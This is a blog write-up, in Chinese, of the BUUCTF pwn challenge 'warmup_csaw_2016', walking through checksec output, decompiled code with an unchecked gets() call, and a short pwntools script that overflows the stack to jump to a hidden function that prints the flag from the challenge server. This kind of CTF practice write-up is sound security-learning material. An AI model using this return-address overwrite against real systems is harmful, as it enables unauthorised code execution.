BUUCTF-PWN爬坑-03-warmup_csaw_2016

warmup_csaw_2016

1.file

root@kali:~/Downloads# file warmup_csaw_2016
warmup_csaw_2016: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7b7d75c51503566eb1203781298d9f0355a66bd3, stripped

64位程序

2.checksec

root@kali:~/Downloads# checksec warmup_csaw_2016
[*] '/root/Downloads/warmup_csaw_2016'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

无保护

3.IDA

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-80h]
  char v5; // [rsp+40h] [rbp-40h]

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(&s, "%p\n", sub_40060D);
  write(1, &s, 9uLL);
  write(1, ">", 1uLL);
  return gets(&v5, ">");
}

运行结果

root@kali:~/Downloads# ./warmup_csaw_2016 
-Warm Up-
WOW:0x40060d
>12

查看 sub_40060D

int sub_40060D()
{
  return system("cat flag.txt");
}

可利用这个函数

构造exp

#!/usr/bin/python3
#coding=utf-8

from pwn import *

port = 25397
p = remote('node3.buuoj.cn',port)

payload = b'a'*0x40 + b'b'*8 + p64(0x40060d)

p.sendline(payload)

p.interactive()

exp 运行结果

root@kali:~/Downloads# python3 exp_warmup_csaw_2016.py
[+] Opening connection to node3.buuoj.cn on port 25397: Done
[*] Switching to interactive mode
-Warm Up-
WOW:0x40060d
>flag{7fe33307-500a-42af-a7a6-b9a039f20b8f}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$

以上为个人做题思路欢迎大家讨论学习。

posted @ 2021-01-19 14:49 墨客moke 阅读(398) 评论(0) 编辑收藏举报

刷新页面返回顶部